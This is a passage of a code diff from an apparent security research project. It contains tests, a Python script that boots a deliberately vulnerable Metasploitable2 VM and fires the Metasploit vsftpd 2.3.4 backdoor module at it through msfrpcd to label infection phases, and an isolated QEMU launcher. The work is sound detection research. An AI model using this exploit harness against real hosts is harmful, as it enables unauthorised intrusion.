assert client.shell_writes == []
def test_arm_is_idempotent() -> None:
driver, client, events = _make_driver(
sessions_after_fire={1: {"type": "shell"}},
)
driver.setup()
driver.set_phase("armed")
driver.set_phase("armed")
fire_calls = [c for c in client.calls if c[0] == "module_execute"]
assert len(fire_calls) == 1
def test_teardown_kills_session_and_logs_out() -> None:
driver, client, events = _make_driver(
sessions_after_fire={1: {"type": "shell"}},
)
driver.setup()
driver.set_phase("armed")
driver.set_phase("infecting")
driver.teardown()
assert any(c[0] == "session_stop" for c in client.calls)
assert client.logged_in is False
assert any(e[0] == "session_killed" for e in events)
# -----------------------------------------------------------------------
# Driver wired into a real EpisodeRunner — events land in events.jsonl
# -----------------------------------------------------------------------
def test_driver_events_persist_to_events_jsonl(tmp_path: Path) -> None:
"""When the driver is connected to a real EpisodeRunner, the
events it emits must show up in the episode's events.jsonl with
monotonic-clock timestamps (so labels and exploit events can be
correlated downstream)."""
import os
from orchestrator.episode import EpisodeConfig, EpisodeRunner
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
client = FakeMSFRpcClient(
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
)
schedule = [
("clean", 0.05),
("armed", 0.05),
("infecting", 0.05),
("infected_running", 0.05),
("dormant", 0.05),
("clean", 0.05),
]
ec = EpisodeConfig(
target_pid=os.getpid(),
duration_s=sum(d for _, d in schedule),
interval_ms=20,
data_root=tmp_path,
phase_schedule=schedule,
)
runner = EpisodeRunner(ec)
driver = MSFExploitDriver(
client=client, # type: ignore[arg-type]
module=cfg,
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
emit_event=runner.emit_event,
)
runner.on_phase = driver.set_phase
driver.setup()
try:
result = runner.run()
finally:
driver.teardown()
events = [
json.loads(l)
for l in (result.episode_dir / "events.jsonl").read_text().splitlines()
]
names = [e["event"] for e in events]
assert "snapshot_load" in names
assert "driver_setup" in names
assert "exploit_fire" in names
assert "session_open" in names
assert "sample_executed" in names
assert "session_dormant" in names
assert "episode_end" in names
# Driver events must carry monotonic timestamps in episode-relative
# order (snapshot_load is essentially at origin, exploit_fire later,
# session_open later still, episode_end last).
by_name = {e["event"]: e for e in events}
assert by_name["snapshot_load"]["t_mono_ns"] < 1_000_000 # <1ms after origin
assert by_name["exploit_fire"]["t_mono_ns"] > by_name["snapshot_load"]["t_mono_ns"]
assert by_name["session_open"]["t_mono_ns"] >= by_name["exploit_fire"]["t_mono_ns"]
assert by_name["episode_end"]["t_mono_ns"] >= by_name["session_open"]["t_mono_ns"]

241
tools/run_tier3_demo.py Normal file
View file

@ -0,0 +1,241 @@
"""Tier-3: real VM, real exploit, honest ``armed -> infecting`` transition.
Boots the vulnerable target VM, drives an msfrpcd-fired exploit module
against it, and lets the orchestrator's host /proc collector sample
the qemu-system pid throughout. Compared to ``run_real_vm_demo.py``:
the workload that crosses the ``armed -> infecting`` boundary is now
generated by an actual exploit landing a session, not by a script in
the guest.
Prereqs:
- vm/images/<target>.qcow2 (e.g. Metasploitable2)
- msfrpcd running locally:
msfrpcd -P <password> -U msf -a 127.0.0.1 -p 55553
- ``msgpack`` python package installed (added to runtime deps)
Run:
MSFRPC_PASSWORD=<pass> uv run python tools/run_tier3_demo.py \\
--module vsftpd_234_backdoor \\
--data-root data
"""
from __future__ import annotations
import argparse
import logging
import os
import signal
import subprocess
import sys
import time
from pathlib import Path
# Allow running as a script.
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
from exploits.driver import DriverConfig, MSFExploitDriver # noqa: E402
from exploits.modules import load_module_config # noqa: E402
from exploits.msfrpc import MSFRpcClient, MSFRpcConfig # noqa: E402
from orchestrator.episode import EpisodeConfig, EpisodeRunner # noqa: E402
# Same envelope shape as Tier 2 so plots are comparable. Slightly more
# armed/infecting time because real exploit fire + session establishment
# takes hundreds of ms to a few seconds.
DEFAULT_SCHEDULE = [
("clean", 10.0),
("armed", 3.0),
("infecting", 5.0),
("infected_running", 25.0),
("dormant", 15.0),
("infected_running", 20.0),
("dormant", 5.0),
("clean", 5.0),
]
def _wait_for_path(path: Path, timeout_s: float) -> None:
deadline = time.monotonic() + timeout_s
while time.monotonic() < deadline:
if path.exists() and path.read_text().strip():
return
time.sleep(0.2)
raise TimeoutError(f"{path} never appeared within {timeout_s}s")
def _wait_for_tcp(host: str, port: int, timeout_s: float) -> None:
import socket
deadline = time.monotonic() + timeout_s
last_err: Exception | None = None
while time.monotonic() < deadline:
try:
with socket.create_connection((host, port), timeout=1.0):
return
except OSError as e:
last_err = e
time.sleep(1.0)
raise TimeoutError(
f"target service {host}:{port} not reachable within {timeout_s}s "
f"(last: {last_err})"
)
def main() -> int:
parser = argparse.ArgumentParser(prog="run_tier3_demo")
parser.add_argument("--data-root", default="data")
parser.add_argument("--interval-ms", type=int, default=100)
parser.add_argument(
"--module",
default="vsftpd_234_backdoor",
help="Module config name in exploits/modules/<name>.toml",
)
parser.add_argument(
"--target-ip",
default="127.0.0.1",
help="Address the exploit module sets RHOSTS to. With the SLIRP "
"launcher (default), the guest's vulnerable port is hostfwd'd to "
"loopback; on a host-only bridge, this is the guest's bridge IP.",
)
parser.add_argument(
"--target-port",
type=int,
default=21,
help="Probe port to wait on before firing the exploit",
)
parser.add_argument(
"--run-dir",
default="/tmp/cis490-target",
help="QEMU run dir (sockets + pidfile)",
)
parser.add_argument(
"--msfrpc-host", default=os.environ.get("MSFRPC_HOST", "127.0.0.1"),
)
parser.add_argument(
"--msfrpc-port", type=int,
default=int(os.environ.get("MSFRPC_PORT", "55553")),
)
parser.add_argument(
"--msfrpc-user", default=os.environ.get("MSFRPC_USER", "msf"),
)
parser.add_argument(
"--keep-vm",
action="store_true",
help="leave the VM running after the episode finishes",
)
parser.add_argument(
"--target-boot-timeout",
type=float,
default=180.0,
help="how long to wait for the guest's vulnerable service to listen",
)
args = parser.parse_args()
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(levelname)s %(name)s %(message)s",
)
log = logging.getLogger("cis490.run_tier3_demo")
msfrpc_password = os.environ.get("MSFRPC_PASSWORD")
if not msfrpc_password:
log.error("MSFRPC_PASSWORD env var must be set")
return 2
repo_root = Path(__file__).resolve().parent.parent
launcher = repo_root / "vm" / "launch_target.sh"
modules_dir = repo_root / "exploits" / "modules"
module_path = modules_dir / f"{args.module}.toml"
if not module_path.exists():
log.error("no module config at %s", module_path)
return 2
module = load_module_config(module_path)
log.info("module loaded: %s (%s)", module.name, module.module_path)
run_dir = Path(args.run_dir)
if run_dir.exists():
import shutil
shutil.rmtree(run_dir)
run_dir.mkdir(parents=True, exist_ok=True)
pid_file = run_dir / "qemu.pid"
log.info("booting target VM via %s (RUN_DIR=%s)", launcher, run_dir)
env = os.environ.copy()
env["RUN_DIR"] = str(run_dir)
qemu = subprocess.Popen(
[str(launcher)],
cwd=str(repo_root),
env=env,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
start_new_session=True,
)
try:
_wait_for_path(pid_file, timeout_s=15.0)
qemu_pid = int(pid_file.read_text().strip())
log.info("qemu pid = %d; waiting for service on %s:%d (timeout %.0fs)",
qemu_pid, args.target_ip, args.target_port,
args.target_boot_timeout)
_wait_for_tcp(args.target_ip, args.target_port, args.target_boot_timeout)
log.info("target service is up")
client = MSFRpcClient(
MSFRpcConfig(
host=args.msfrpc_host,
port=args.msfrpc_port,
user=args.msfrpc_user,
password=msfrpc_password,
)
)
cfg = EpisodeConfig(
target_pid=qemu_pid,
duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
interval_ms=args.interval_ms,
data_root=Path(args.data_root),
phase_schedule=DEFAULT_SCHEDULE,
image_name=module.name + "-target",
snapshot_name="qcow2-snapshot-on",
)
runner = EpisodeRunner(cfg)
driver = MSFExploitDriver(
client=client,
module=module,
cfg=DriverConfig(target_ip=args.target_ip),
emit_event=runner.emit_event,
)
runner.on_phase = driver.set_phase
driver.setup()
try:
result = runner.run()
finally:
driver.teardown()
print()
print(f"episode_id = {result.episode_id}")
print(f"path = {result.episode_dir}")
print(f"rows_proc = {result.rows_proc}")
print(f"phases = {result.phases_observed}")
print(f"module = {module.module_path}")
print()
print("To plot:")
print(f" uv run python tools/plot_envelope.py {result.episode_dir}")
return 0
finally:
if not args.keep_vm:
log.info("shutting down VM (pid=%d)", qemu.pid)
try:
os.killpg(os.getpgid(qemu.pid), signal.SIGTERM)
except ProcessLookupError:
pass
try:
qemu.wait(timeout=5)
except subprocess.TimeoutExpired:
os.killpg(os.getpgid(qemu.pid), signal.SIGKILL)
if __name__ == "__main__":
sys.exit(main())

95
vm/launch_target.sh Executable file
View file

@ -0,0 +1,95 @@
#!/usr/bin/env bash
# Boot the Tier-3 *target* VM (the intentionally-vulnerable guest the
# exploit fires against). Companion to ``launch_demo.sh``, which boots
# the *idle* Alpine guest used in Tiers 1-2.
#
# Networking note: this launcher uses SLIRP usermode networking with
# ``restrict=on`` plus an explicit ``hostfwd`` for each vulnerable port.
# That gives us:
# - the host can reach the guest's services (for msfrpcd + the
# exploit module to drive ``RHOSTS=127.0.0.1``)
# - the guest cannot reach the host or the internet (no NAT exit)
#
# The host-only ``br-malware`` bridge described in docs/architecture.md
# replaces SLIRP once the bridge-side pcap collector (source 4) lands —
# at which point payloads with ``reverse_tcp`` callbacks become viable
# too. Until then, we restrict module choices to ones that return a
# shell on the same socket they exploit (e.g. vsftpd_234_backdoor).
#
# Run-dir contract (read by run_tier3_demo.py):
# $RUN_DIR/qemu.pid
# $RUN_DIR/qmp.sock
# $RUN_DIR/monitor.sock
# $RUN_DIR/serial.sock
set -euo pipefail
REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
IMAGE="${IMAGE:-$REPO_ROOT/vm/images/metasploitable2.qcow2}"
RUN_DIR="${RUN_DIR:-/tmp/cis490-target}"
RAM_MIB="${RAM_MIB:-512}"
# Ports the host should forward to the guest. Comma-separated host:guest pairs.
# Default covers the vsftpd module's RPORT.
TARGET_PORTS="${TARGET_PORTS:-21:21}"
# KVM if the host can take it; otherwise fall back to TCG. Cross-arch
# images (Metasploitable2 is x86-only) on aarch64 hosts will need TCG.
ACCEL="${ACCEL:-}"
mkdir -p "$RUN_DIR"
QMP_SOCK="$RUN_DIR/qmp.sock"
MON_SOCK="$RUN_DIR/monitor.sock"
PID_FILE="$RUN_DIR/qemu.pid"
SERIAL_SOCK="$RUN_DIR/serial.sock"
if [[ ! -f "$IMAGE" ]]; then
cat >&2 <<EOF
no target image at $IMAGE
Drop a vulnerable Linux qcow2 there. The canonical choice is
Metasploitable2 — see docs/sources.md for the download + sha256.
If the image is x86 and your host is not, set ACCEL=tcg explicitly.
EOF
exit 1
fi
# Build the netdev string with one hostfwd= per requested port pair.
NETDEV="user,id=n0,restrict=on"
IFS=',' read -ra _PAIRS <<< "$TARGET_PORTS"
for pair in "${_PAIRS[@]}"; do
host_port="${pair%%:*}"
guest_port="${pair##*:}"
NETDEV+=",hostfwd=tcp:127.0.0.1:${host_port}-:${guest_port}"
done
# Pick acceleration: explicit override wins; otherwise use KVM if the
# device is present, else TCG.
if [[ -z "$ACCEL" ]]; then
if [[ -e /dev/kvm && -r /dev/kvm && -w /dev/kvm ]]; then
ACCEL="kvm"
else
ACCEL="tcg"
fi
fi
CPU_FLAGS=()
if [[ "$ACCEL" == "kvm" ]]; then
CPU_FLAGS=(-cpu host)
fi
# snapshot=on so the qcow2 is never mutated — every boot is identical.
exec qemu-system-x86_64 \
-name cis490-target \
-machine q35,accel="$ACCEL" \
"${CPU_FLAGS[@]}" \
-smp 1,sockets=1,cores=1,threads=1 \
-m "$RAM_MIB" \
-drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
-netdev "$NETDEV" \
-device virtio-net-pci,netdev=n0 \
-nographic \
-serial unix:"$SERIAL_SOCK",server=on,wait=off \
-monitor unix:"$MON_SOCK",server=on,wait=off \
-qmp unix:"$QMP_SOCK",server=on,wait=off \
-pidfile "$PID_FILE" \
-display none